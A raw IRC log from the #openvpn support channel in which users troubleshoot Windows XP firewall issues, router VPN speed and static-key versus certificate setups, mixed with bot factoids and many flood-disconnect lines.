your firewall rules imo. 06:55 < Azrael_-> kisom: yeah, but in winxp the service is also name as "windows firewall/shared internet connection"-service. thus i think there are more features included beside the firewall-blocking 06:56 < Azrael_-> *named 06:56 <@novaflash> sounds a little strange to me too. perhaps you can try starting the firewall service, then going into the windows security settings and disabling the firewall completely. perhaps then things will start functioning properly again. 06:58 <@novaflash> and ICS, internet connection sharing, is not necessary to just get a connection to the internet - but it is required if you want to share your internet connection to other machines on your network if you have a second network card and share the internet on that. i don't know why anyone would want to do this, since people usually just have a router and a switch to take care of business, but... 06:58 <@novaflash> ...it's possible, i suppose. 06:59 < Azrael_-> i know as i don't use this feature 06:59 < Azrael_-> just trying the disabling-scenario 07:05 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 07:06 < sam1> !welcome 07:06 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 07:06 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 07:07 < sam1> !mitm 07:07 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 07:08 < sam1> !topology 07:08 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 07:13 < sam1> !route 07:13 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 07:16 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has left #openvpn [] 07:53 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Ping timeout: 252 seconds] 07:54 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 07:54 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 07:54 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 07:54 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 07:54 -!- Guest23205 [~Mimiko@77.89.245.38] has joined #openvpn 07:54 -!- Guest23205 [~Mimiko@77.89.245.38] has quit [Excess Flood] 07:54 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 07:54 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 07:54 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 07:54 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 07:55 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 07:55 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:00 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:01 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:02 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:03 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:04 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:04 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:04 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:04 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:04 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:04 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:05 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:06 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:07 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:07 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:07 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:07 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:07 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:07 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:08 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:09 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:09 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:09 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:09 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:09 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:09 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:10 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:11 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:11 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:11 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:11 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:11 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 08:11 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:11 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 08:11 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:11 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 08:11 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:12 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:12 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:12 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:12 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:12 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:12 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:13 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 08:13 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:13 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 08:13 -!- Mimiko [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:13 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 08:13 -!- Mimiko is now known as Guest81896 08:13 -!- Guest81896 [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:13 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:13 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:13 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:14 -!- erry [erry@freenode/staff/erry] has joined #openvpn 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:14 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:15 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:16 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 08:16 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:21 -!- Saviq [~Saviq@canonical/saviq] has quit [Ping timeout: 248 seconds] 08:22 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 08:25 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [] 08:26 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has joined #openvpn 08:26 -!- Mimiko^_^ [~Mimiko@77.89.245.38] has quit [Excess Flood] 08:36 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 08:36 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Quit: leaving] 08:45 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 08:49 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 08:52 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 08:56 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 09:22 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 09:28 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:34 -!- AsadH is now known as zz_AsadH 09:47 -!- jthunder [~jthunder@184.151.222.180] has joined #openvpn 09:53 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Ping timeout: 245 seconds] 10:14 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 10:14 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 10:14 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 10:15 -!- zz_AsadH is now known as AsadH 10:18 -!- b1rkh0ff [~b1rkh0ff@31.176.186.83] has quit [Ping timeout: 240 seconds] 10:24 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza] 10:27 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has joined #openvpn 10:32 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:38 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer] 10:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 10:39 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 10:43 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 10:43 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 10:45 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 10:46 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 245 seconds] 10:51 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 10:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:54 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Ping timeout: 255 seconds] 11:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 11:01 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 11:06 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 11:11 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:16 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:21 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Quit: ZNC - http://znc.in] 11:21 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 11:21 -!- bisko [~bisko@77.70.26.115] has quit [Ping timeout: 245 seconds] 11:22 -!- raidz [~raidz@raidz.im] has joined #openvpn 11:22 -!- raidz [~raidz@raidz.im] has quit [Changing host] 11:22 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:22 -!- mode/#openvpn [+o raidz] by ChanServ 11:30 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:31 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 245 seconds] 11:34 -!- b1rkh0ff [~b1rkh0ff@92.36.195.218] has joined #openvpn 11:54 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has joined #openvpn 11:57 -!- Valcorb|| [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 12:00 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 240 seconds] 12:02 -!- AsadH is now known as zz_AsadH 12:04 -!- b1rkh0ff [~b1rkh0ff@92.36.195.218] has quit [Ping timeout: 252 seconds] 12:05 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 12:05 -!- b1rkh0ff [~b1rkh0ff@31.176.168.75] has joined #openvpn 12:06 -!- Valcorb|| [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 256 seconds] 12:08 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds] 12:08 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 12:11 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 12:32 -!- jthunder [~jthunder@184.151.222.180] has quit [Ping timeout: 260 seconds] 12:37 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 12:41 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 255 seconds] 12:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:04 -!- kusznir [~kusznir@76.178.145.28] has quit [Read error: Connection reset by peer] 13:05 -!- kusznir [~kusznir@76.178.145.28] has joined #openvpn 13:17 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer] 13:20 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn 13:25 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Ping timeout: 248 seconds] 13:36 -!- jthunder [~jthunder@70.28.245.77] has joined #openvpn 13:52 -!- zz_AsadH is now known as AsadH 14:07 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 14:08 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 14:08 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn 14:34 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 14:34 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 14:35 -!- kusznir [~kusznir@76.178.145.28] has quit [Read error: Connection reset by peer] 14:40 -!- brute11k [~brute11k@89.249.230.238] has quit [Quit: Leaving.] 14:44 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 14:48 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn 15:02 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 15:16 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:19 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn 15:19 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Remote host closed the connection] 15:26 -!- bjh4 [~bjh4@12.239.198.1] has quit [Quit: Leaving] 15:55 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [] 15:55 < Azrael_-> hi 16:00 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:01 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Ping timeout: 260 seconds] 16:03 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 16:04 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:05 < Eagleman7> Any idea why openvpn on my router with redirect-gateway is way slower than a direct connection from my pc to the vpn server with redirect-gateway ? 16:05 < Eagleman7> 12mbit vs 55 mbit difference, exact same config files 16:08 < rob0> maybe the router is CPU- and memory-constrained and cannot keep up with the encryption task. 16:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Connection reset by peer] 16:12 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Connection reset by peer] 16:13 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:16 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:16 < Eagleman> Looks like the cpu is to slow on the router 16:20 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 16:21 -!- dazo is now known as dazo_afk 16:25 < Azrael_-> had some trouble setting up openvpn on winxp sp3. failed miserably with 2.2. reinstalled the whole windows and tried now 2.3 and everything worked just fine 16:26 < Azrael_-> (one advantage perhaps: i didn't try hamachi first) 16:35 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 16:38 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [Ping timeout: 255 seconds] 16:39 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn 16:39 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 245 seconds] 16:46 -!- hurleyman [~hurleyman@mail.caffalltile.com] has joined #openvpn 16:47 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 16:47 < hurleyman> hello 16:49 < blackmagic> hello. 16:49 < hurleyman> I have a quick question. I have a small business server and I am reading up on VPN. At the most we will have maybe 1 or 2 users connected 16:50 < hurleyman> would you recommend a static key setup 16:50 <@krzee> no i would not 16:50 <@krzee> !statickey 16:50 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info 16:50 < blackmagic> for both users? no. i would create a server/client setup PER user. 16:50 <@krzee> per user? 16:50 <@krzee> 1 pki will handle all users 16:50 <@krzee> and other offices 16:50 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 245 seconds] 16:51 < blackmagic> heh i did one per user :x 16:52 < hurleyman> perfect. the more I was reading made sense to go server/client but I also didnt want to go overkill 16:52 <@krzee> static key has no forward security 16:52 < blackmagic> no such thing as overkill LOL. 16:52 <@krzee> for simply that reason ild use server/client whenever possible 16:53 <@krzee> and if you have 2 clients, thats another reason to use server/client 16:53 <@krzee> bbl, break is over =] 16:53 < blackmagic> heh 16:53 -!- AsadH is now known as zz_AsadH 16:53 < hurleyman> and makes sense for growth. it would suck if I had to change it all in a few months cause more users are wanting VPN 16:53 < blackmagic> working on his break :D 16:53 < blackmagic> hurleyman, create yourself a vpnusersetup.sh if that be the case. 16:53 <@krzee> im on vacation, voluntary ranch work 16:53 < blackmagic> ah. 16:54 <@krzee> just finished rolling 1 16:54 <@krzee> :D 16:54 <@krzee> bbl 16:54 < blackmagic> hopefully a doobie ;P 16:55 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 16:56 < hurleyman> thanks for your help. going to dive into the guides to do some test on a suse vm 16:57 < dvl> Anyone using gmirror on FreeBSD? nearly done instructions for installing directly onto a gmirror when doing a fresh install of FreeBSD 9.1 17:04 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn 17:08 -!- jthunder [~jthunder@70.28.245.77] has quit [Ping timeout: 256 seconds] 17:14 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 17:17 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 17:20 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has left #openvpn ["Leaving"] 17:32 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 17:35 -!- hurleyman [~hurleyman@mail.caffalltile.com] has quit [] 17:48 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has quit [Quit: Orbi] 17:52 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds] 17:55 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 18:11 -!- MeanderingCode_ [~Meanderin@75-173-12-215.albq.qwest.net] has joined #openvpn 18:11 <@krzee> blackmagic, definitely a doob 18:11 <@krzee> dvl, i use zfs mirror instead 18:12 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 255 seconds] 18:12 < dvl> krzee: that's close, but I'm building a bigger array. ;) 18:39 -!- jthunder [~jthunder@174.3.126.51] has quit [Remote host closed the connection] 18:39 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 18:41 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 18:44 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 18:45 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 18:49 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 18:57 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 18:57 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 19:01 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 19:02 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 19:02 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 19:03 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 19:28 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Operation timed out] 19:28 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 19:35 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 19:42 -!- raidz is now known as raidz_away 19:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 19:52 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 19:52 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 19:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:17 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 20:24 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 20:28 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Quit: ZNC - 